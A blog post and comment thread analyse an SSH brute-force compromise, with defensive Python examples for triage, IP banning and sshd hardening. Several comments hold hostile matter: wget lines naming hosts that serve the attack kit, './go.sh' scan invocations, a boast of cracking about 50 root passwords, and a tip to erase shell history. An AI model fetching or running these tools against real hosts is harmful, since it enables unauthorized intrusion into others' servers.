Here's what I can glean from them. First he checks who else is using the system, and how long it's been idle. Then he checks my mount history and mounts another Linux partition (for Ubuntu Karmic). Then he changes my root password. I'm not sure why he did this; had he left it alone he would have had root access and I would never have known my system was compromised. Then he goes to a hidden .tmp directory and unzips gosh.tar, enters the directory, makes all files inside executable, and runs several commands. After he attempts to run go.sh, he adds an alias for my ethernet card. I'm not sure what the purpose of this is. He then runs go.sh again. Afterwards he types "1", which is a file, but it's only a list of user names and passwords, presumably for a brute force attack. I find it notable that (1) it appears to be a person, and not a bot/script, hence the typo ";s" instead of "ls", and (2) the .bash_history was not erased. I'm not sure about the usage of "screen": I'm assuming that screen logs commands in .bash_history, but maybe it does not. Also, I don't know if commands issued through ssh (without using a login shell) or sftp are logged in .bash_history; that would explain how gosh.tar got on my system but is not mentioned in the .bash_history.

One script, "scam", sends mail to the address "mafia89tm@yahoo.com". I'm not sure if this script was ever called. Here's part of it (it's long, and repetitive). Unfortunately, with the current formatting of this blog you lose the rad ASCII art, so I've included it here.

Yeah, you may be right about that. It seems odd that it’s such a small, geographically limited list. I checked one of them and it’s from Malaysia. I’ve thought that it may also be IPs that it will take orders from?

So, scan an entire class-A as fast as possible from eth0. The IP addresses that respond on port 22 (ssh) get added to bios.txt. The second line from go.sh sorts and removes duplicates from the list of IP addresses, and outputs to mfu.txt. ssh-scan is the SSH brute force tool. It takes input from the file “mfu.txt” as a list of IP addresses to attack, and from file “pass_file” as a list of username/password combinations to try. Output (user:pass:IP) goes to “vuln.txt”. Take a closer look at the script named “a” for additional post processing.

@James – That first IP appears to be from Romania, and the second from the UK. I suppose at least one of those is another compromised machine?

@Kenny – Thanks for the insight on those IPs. I don’t quite understand where those particular IPs are coming from. Just a random assortment of new targets running ssh? I tried using a reverse DNS lookup on a few of them, but it was unsuccessful.

A network/port scanner is like a brute forcer or wardialer for network services. This scanner was pointed at the 211 class A and tried connecting to every IP (211.*.*.*) on port 22. The IP addresses listed are the hosts that answered. They were targets for the attacks coming from your host, but not yet victims. If you had any entries in vuln.txt, then you would have victims to notify. (Contents could have been removed.) The IPs are all over the APNIC map: China, Taiwan, Malaysia, Australia, and Korea.
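The distinction drawn above (hosts in bios.txt/mfu.txt merely answered on port 22; hosts in vuln.txt were actually logged into and need notifying) is easy to get wrong when sorting through a compromised box by hand. The following is an added example, not code from the post or from the scanner, that triages those files. It assumes the formats the comments describe: one IPv4 address per line for bios.txt/mfu.txt, and user:pass:IP records in vuln.txt. The file contents embedded in it are constructed samples, not real scanner output, and the /16 grouping is only a rough first cut for abuse-contact lookup.

```python
"""Triage of the scanner's output files recovered from a compromised host.

Added example; not code from the post, nor part of the scanner.
File contents below are constructed samples.
"""
import ipaddress
from collections import defaultdict

# Constructed sample of bios.txt: raw responders, with duplicates and junk.
BIOS_TXT = """\
211.24.3.9
211.24.3.9
211.99.120.7
not-an-ip
211.200.1.45
211.99.120.7
"""

# Constructed sample of vuln.txt (user:pass:IP). The password field may
# itself contain ':', so the IP is taken from the right-hand end.
VULN_TXT = """\
root:password:211.99.120.7
admin:ab:cd:211.200.1.45
garbage line
"""


def parse_ip_list(text):
    """The `sort -u` step of go.sh, but dropping malformed lines."""
    ips = set()
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ips.add(ipaddress.IPv4Address(line))
        except ipaddress.AddressValueError:
            continue          # not an address: skip, do not abort the run
    return sorted(ips)


def parse_vuln(text):
    """Parse user:pass:IP records into sorted (ip, user) pairs.

    The cracked password is deliberately dropped: notification needs only
    the host and account, and copying credentials into yet another file
    on the box would just recreate the attacker's vuln.txt.
    """
    victims = []
    for line in text.splitlines():
        if line.count(":") < 2:
            continue
        user, rest = line.strip().split(":", 1)
        _password, ip = rest.rsplit(":", 1)
        try:
            victims.append((ipaddress.IPv4Address(ip), user))
        except ipaddress.AddressValueError:
            continue
    return sorted(victims)


def triage(bios_text, vuln_text):
    """Separate targets (answered on 22) from victims (logged into) and
    bucket victims by /16 as an approximation of 'same network owner'.
    Real allocations come from whois/RDAP, which this offline code skips."""
    targets = parse_ip_list(bios_text)
    victims = parse_vuln(vuln_text)
    by_block = defaultdict(list)
    for ip, user in victims:
        block = ipaddress.ip_network(f"{ip}/16", strict=False)
        by_block[str(block)].append(f"{ip} ({user})")
    return {
        "targets": len(targets),
        "victims": [(str(ip), user) for ip, user in victims],
        "notify": dict(by_block),
    }


if __name__ == "__main__":
    for key, value in triage(BIOS_TXT, VULN_TXT).items():
        print(key, value)
```

Run it against the real files with `triage(open("bios.txt").read(), open("vuln.txt").read())`; an empty "victims" list with a non-empty "targets" count is the "targets but not yet victims" situation described above, though, as the comment also notes, vuln.txt may simply have been emptied before you found it.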

Oh, and as for why they changed your password, the script kiddie's MO is "own more stuff than the other guy." If they share, then someone else is likely to get the attention of the admin and spoil the fun. So they plug obvious holes, like the one they got in through. Generally speaking, an admin who isn't present enough to change a default password won't notice if it gets changed for them.

screen is a terminal multiplexer, ssh to a server, type ‘screen’ and you can have multiple ‘sessions’ although you’ve only logged in once. (That’s not the most accurate description but once you try it out, you’ll understand…it’s pretty awesome.)

It was probably somebody who got really lucky and was just typing stuff they saw on some website, hence the typo (and the reason for changing the password). As you noted, someone less careless would have been more difficult to detect.

Thanks for your comment Ashley. I’m actually familiar with screen, but what I wasn’t sure about was whether screen logged its commands to .bash_history. It turns out it doesn’t (or at least not the way things are configured on my machine). So that may explain why certain files appeared on my machine, with no reference in the history as to how they got there.

I agree with you though, this was probably just the work of a script kiddie — I almost certainly wouldn’t have caught it (or at least not for a much longer time) if it was the work of someone more experienced.

You can get these files from this address:
wget adelinuangell.lx.ro/cote/go.tar
This guy accessed my computer and logged some commands to .bash_history.
I found this address in .bash_history.
Screen is a utility to remove log information from wtmp/utmp, I think.

That is an ssh brute force scanner and it is quite common in the script kiddie groups. The bad thing about it is that it is used to scan an entire IP class (notice ./ss -a); the attacker scanned 211.*.*.*, and on a machine without a good processor this can crash the Linux machine in a few seconds.

mfu.txt is the list of IPs, sorted and stripped of duplicate entries.
pscan2 is a scan binary used to run the scanner as a non-root user, since ./ss can be used only by a uid 0 user.

As usual this is normal behaviour for Linux kiddies: they get some shit like this and ruin people's PCs.
As far as I know there is a new hacking report service at http://rep.hack-report.info. They are new in the business but are doing good work: once your site is reported as attacked and a log is submitted, they report the attacker to the local authorities in whatever country the attacker may be. In your case I am sorry to announce that the attacker is from my country, Romania. I know that because I have personally investigated some attacks and I have found this scanner.

I have seen thousands of these attacks, and was so annoyed at watching my logs fill up with rubbish that I wrote a Linux service to monitor syslog, gather the evidence, ban the IP address with iptables, get the abuse address responsible for the IP address and send a mail notifying them that one of their machines is owned, after checking a do-not-mail list of delinquent ISPs.
In many cases the mails are ignored, bounce or defer (those are then added to the do-not-mail db), but some are actually read and acted upon, and some compromised machines do get fixed, sometimes even with a thank-you note, which really does make the 100,000+ messages I have sent worthwhile.

The IP addresses go into a database, currently 1.25 million rows, each containing the dates of the last ten times seen, ban type, status and how many times banned. They are linked to another table containing the evidence.

Another process expires the ban from iptables (10 * number of bans) days later.
It also handles ftp brute force attacks.

I have another one that scans the maillog, and sends reports for smtp and pop3 abuses… It’s good to kick some ass in return!
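The comment above describes the essential pieces of a log-driven ban service: match the failed-login lines, keep a per-IP record (last ten sightings, ban count, status, evidence), insert an iptables rule, and expire it after 10 * (number of bans) days. The following is an added example of that logic, not the commenter's code. It assumes sshd logs through syslog in the usual "Failed password for [invalid user] NAME from IP port N" form, uses an arbitrary threshold of five failures before banning, and returns the iptables commands as strings instead of executing them. The log lines embedded in it are constructed samples.

```python
"""Brute-force monitor with escalating iptables bans, modelled on the
service the comment above describes.  Added example; not the commenter's
code.  THRESHOLD is an arbitrary choice; ban length follows the comment:
10 * (number of bans so far) days.  Log lines are constructed samples.
"""
import re
from collections import Counter, deque
from datetime import datetime, timedelta

THRESHOLD = 5

FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)

SAMPLE_LOG = """\
Feb  3 04:11:02 box sshd[2231]: Failed password for root from 211.24.3.9 port 51234 ssh2
Feb  3 04:11:04 box sshd[2231]: Failed password for root from 211.24.3.9 port 51234 ssh2
Feb  3 04:11:05 box sshd[2240]: Accepted password for deploy from 192.0.2.10 port 40000 ssh2
Feb  3 04:11:06 box sshd[2233]: Failed password for invalid user admin from 211.24.3.9 port 51240 ssh2
Feb  3 04:11:07 box sshd[2235]: Failed password for invalid user oracle from 211.24.3.9 port 51241 ssh2
Feb  3 04:11:08 box sshd[2237]: Failed password for root from 211.24.3.9 port 51242 ssh2
Feb  3 04:12:00 box sshd[2250]: Failed password for root from 198.51.100.7 port 22222 ssh2
"""


def count_failures(log_text):
    """Return (failed logins per IP, matching log lines per IP as evidence)."""
    counts, evidence = Counter(), {}
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            counts[m.group("ip")] += 1
            evidence.setdefault(m.group("ip"), []).append(line)
    return counts, evidence


def apply_bans(db, counts, evidence, now, threshold=THRESHOLD):
    """Ban each IP at or over threshold that is not already banned.
    db maps ip -> record (the commenter's table); returns iptables commands."""
    cmds = []
    for ip, n in counts.items():
        if n < threshold:
            continue
        rec = db.setdefault(ip, {"times_banned": 0, "seen": deque(maxlen=10),
                                 "status": "clear", "expires": None, "evidence": []})
        rec["seen"].append(now)                   # keeps the last ten sightings only
        rec["evidence"].extend(evidence.get(ip, []))
        if rec["status"] == "banned":
            continue                              # rule already in place
        rec["times_banned"] += 1
        rec["status"] = "banned"
        rec["expires"] = now + timedelta(days=10 * rec["times_banned"])
        cmds.append(f"iptables -I INPUT -s {ip} -j DROP")
    return cmds


def expire_bans(db, now):
    """Lift bans past expiry. times_banned is kept, so the next ban is longer."""
    cmds = []
    for ip, rec in db.items():
        if rec["status"] == "banned" and rec["expires"] <= now:
            rec["status"], rec["expires"] = "clear", None
            cmds.append(f"iptables -D INPUT -s {ip} -j DROP")
    return cmds


def demo():
    """Walk one offender through ban, expiry and a longer second ban."""
    db = {}
    counts, evidence = count_failures(SAMPLE_LOG)
    t0 = datetime(2010, 2, 3, 4, 12)
    first = apply_bans(db, counts, evidence, t0)
    repeat = apply_bans(db, counts, evidence, t0)          # no duplicate rule
    too_early = expire_bans(db, t0 + timedelta(days=9))
    lifted = expire_bans(db, t0 + timedelta(days=11))
    t1 = t0 + timedelta(days=12)
    second = apply_bans(db, counts, evidence, t1)
    return {"first": first, "repeat": repeat, "too_early": too_early,
            "lifted": lifted, "second": second,
            "second_days": (db["211.24.3.9"]["expires"] - t1).days,
            "times_banned": db["211.24.3.9"]["times_banned"]}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

In a real service the `db` dict would be the database table and the returned commands would be run through `subprocess` with a list argument (never a shell string built from log content); the evidence list per IP is what goes into the abuse mail.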

lol,
it's a script to brute-force roots, but there is no attacker's real IP, because once the hacker hacked the first shell, from that shell he hacks others. It is a long process to scan thousands of IPs, so he needs a Linux shell that stays online 24/7, and only VPSs or workstations have this ability with high performance, like Intel Xeon, i7, AMD Opteron processors, etc. Hackers need Linux shells to build on, servers to control other zombie clients, or to perform a high-traffic DDoS attack, etc.

Please don't waste time trying to catch the person who did this. Only try securing your box.

Ilir,
I know this won’t catch the hacker because they can be behind a long chain of proxies, but it helps to alert the owners that their server is hacked and get it cleaned up and secured.
Hopefully they will learn to be better administrators and not use stupid passwords!

You have been hacked by a Romanian hacker team, and I read in that screen:
"private scanner. The scanner can be used only by the `MaLaSorTe` team. This scanner `contains` a password file 3 megabytes long".
lol, try to find the 3 MB pass log and delete it, because maybe it is chmod 777, and look for other files that are chmod 777, because the hackers are writing executables on your server and then upgrading your server for a laugh :))

I have the full script and I have toyed with it. Try ./go.sh 140.0; it scans ranges of IPs and then brute-forces the passwords :) I have popped like 50 root passwords now, kinda cool really, but I don't do anything with them. I typed that from a root ssh and it will scan for a bit. La-AmParam means you got one; it will place the cracked roots in a file called Vuln.txt. It's just a simple scanner, no harm, but it uses a lot of bandwidth. Watch out for scan.pl though, because that's a UDP, TCP, XSS, RFI, LFI scanner! Perl.

Yeah bro, I don't think http://rep.hack-report.info will be doing much of anything; their account is suspended for hacking the box ROFL ROFL ROFL. Not to sound kiddy-like :) but disable history, -c :)) Find the SOB, kick his door in :) smack him around a bit, tell him why you are there and then take off.

I just went to the history command and found that two directories were created, one in /home/root called zen and another in /tmp called .ssh. I just deleted it all. I just cannot understand how it is possible that someone called human would do this. Should we apply the same laws to them that we apply to productive people? fuf…………. The guy downloaded alecsafk.ilive.ro/a/a.tgz. Here is what he did (he is so stupid that he even made a typo!!)

it’s a script that scans for other computers that have vulnerable sshs passwords ( thesma e way he hacked your computer ) he changue de eth0 becouse the scanner need that subnet and stuff the mfu are a list of possible vulnerable victims ,, karl-koch@hotmail.com if i can help you Messenger.

" SCANER PRIVAT
SCANER FOLOSIT DOAR DE TEAMUL MaLaSorTe
SACNERUL CONTINE UN PASS_FLIE DE 3MEGA !! "
Translated from Romanian: "PRIVATE SCANNER. SCANNER USED ONLY BY THE MaLaSorTe TEAM. THE SCANNER CONTAINS A 3 MB PASS_FILE !!"
These are Romanian script kiddies. You can't trace them to Romania because they use multiple servers, just like Lotus said. Get a server, scan from it till it breaks.

Oh! This is alarming. I thought Linux had great security in preventing hacker attacks. However, there seems to be a way to get into any server. While technology keeps advancing, so do the hacking techniques.

I think these hackers use a network of proxies which makes it difficult to identify from which IP they are targeting the server. While ssh is the most easily used way to gain access to a remote shell, this is where we need to make it more secure.

The best way to secure your server is to change your ssh server port, or to disable root login (they can get access to your server via a user and use some local root exploit to gain root access), because the ssh scanners use port 22 to scan for victims. On my server, ssh is using a 4-digit port, like 6354, and I never get hacked.
PS: sorry for my bad english :P

Installing and configuring Fail2Ban will help too, securing the server by blocking the IP address of somebody that tries to access the server after a couple of tries. The default is 3. This alone is not enough, but it can be added to the other suggestions mentioned in this blog.
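The last few comments disagree about what actually matters in sshd_config: moving the port, disabling root login, or rate-limiting with Fail2Ban. The following is an added example, not code from the post or from OpenSSH, that audits a config for the settings a password-guessing scanner like this one depends on: PermitRootLogin, PasswordAuthentication, MaxAuthTries and the Port. The port is reported as informational only, since a non-default port just removes the host from a port-22 sweep (a later comment in this thread reports a box on port 40022 compromised the same way). It assumes the plain "Keyword value" form and sshd's rule that the first occurrence of a keyword wins; keywords inside a Match block are ignored by this parser. Both configs embedded in it are constructed, a weak one beside a hardened one.

```python
"""Audit an sshd_config for the settings an ssh brute forcer relies on.

Added example; not code from the post or from OpenSSH.  Assumes sshd's
first-occurrence-wins rule and stops at the first Match block.  Both
configs below are constructed.
"""

# Constructed "before": a default-ish install, with the classic mistake of
# a later PasswordAuthentication line that sshd will ignore.
WEAK_CONFIG = """\
Port 22
#PermitRootLogin prohibit-password
PermitRootLogin yes
PasswordAuthentication yes
PasswordAuthentication no
UsePAM yes
"""

# Constructed "after": key-only logins, no root over ssh, fewer guesses.
HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
MaxAuthTries 3
AllowUsers deploy
Match User deploy
    PasswordAuthentication no
"""


def parse_sshd_config(text):
    """Return {keyword_lower: first value}; settings after a Match line
    apply only to matched connections, so parsing stops there."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            break
        settings.setdefault(key, value)       # first occurrence wins
    return settings


def audit(text):
    """Return (severity, keyword, message) triples; empty means nothing flagged."""
    s = parse_sshd_config(text)
    findings = []
    root = s.get("permitrootlogin")
    if root is None:
        findings.append(("high", "PermitRootLogin",
                         "not set; default depends on OpenSSH version "
                         "(older releases default to yes)"))
    elif root.lower() not in ("no", "prohibit-password", "without-password"):
        findings.append(("high", "PermitRootLogin",
                         f"{root}: root is reachable by password guessing"))
    if s.get("passwordauthentication", "yes").lower() == "yes":
        findings.append(("high", "PasswordAuthentication",
                         "yes (the default when absent): dictionary attacks "
                         "can succeed; use keys"))
    try:
        tries = int(s.get("maxauthtries", "6"))     # sshd default is 6
    except ValueError:
        tries = 6
    if tries > 3:
        findings.append(("high", "MaxAuthTries",
                         f"{tries}: many guesses per connection before disconnect"))
    if s.get("port", "22") == "22":
        findings.append(("info", "Port",
                         "22: visible to port-22 sweeps; moving it is not a "
                         "substitute for the settings above"))
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name)
        for sev, key, msg in audit(cfg):
            print(f"  [{sev}] {key}: {msg}")
```

Run it on a live system with `audit(open("/etc/ssh/sshd_config").read())`, then confirm what sshd actually loaded with `sshd -T`, which prints the effective values after the first-occurrence rule and any Match blocks have been applied.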

Basically what everybody else said. The "ss" binary is designed to scan an IP range for servers with a given port open. It does thousands of scans per minute and saves the results to a text file. The other executables take an input file (the IP list) and an output file. It's most likely that if you got broken into, it was through a really simple ssh brute force (seriously, "password" is not a good password), an RFI exploit, or even an RCE exploit (google them). Use your brains when setting up a server and you'll be fine.

Hi guys! I just saw what you wrote. Unfortunately most of the so-called "hackers" are from Eastern Europe (e.g. Macedonia, Bulgaria, Romania, etc.). They are just using your machine to gain access to other machines and so on… Probably you have a weak password (pass, password, 123456, root… and so on) and do not have a honeypot installed. Try installing a honeypot and keeping your system up-to-date. It always helps. Another personal point of view is that if you disable root login it will be safe. Another idea would be to uninstall command-line editors (pico, nano) and also wget, apt-get, yum, ftp and stuff like this. If you don't allow him to access external links he will find your machine useless and move on to the next one.
Best Regards,
Chip.

The MFU.TXT is the IP range the hacker scans with the ssh scanner; it's an ssh-root scanner.
The result must be in a txt called "VULN.TXT".
It's an old kind of SSH scanner by a Romanian hacker team.
They now have a new and stronger one in the Arab team and the Indonesian team……

The scan goes as follows, from an IP:
./go.sh 211
./GO-SH + IP <> starts a scan from 211.0.0.1 to 211.255.255.255
After getting the result and finding port 22 open on some IP,
the program checks the IP against the pass file called
pass_file <<>>

I just realized that one of my servers (an OpenVZ container launched alongside many others) got hacked the exact same way.
What is strange is that I already ran SSH on a non-standard port like 40022.
In my case the deploy user that I use for accessing the local git repository was hacked; I'm not even sure what password was set for that user.

Is there any way I can cleanup my server or I should drop it and start with new VPS ?

I have this exact problem at this very moment on one of my servers, and I'm not able to get rid of it. I disabled root login via ssh, deleted the binaries and all the related files, and somehow this guy gets root again and has these files again in /usr/share/locales/af/ …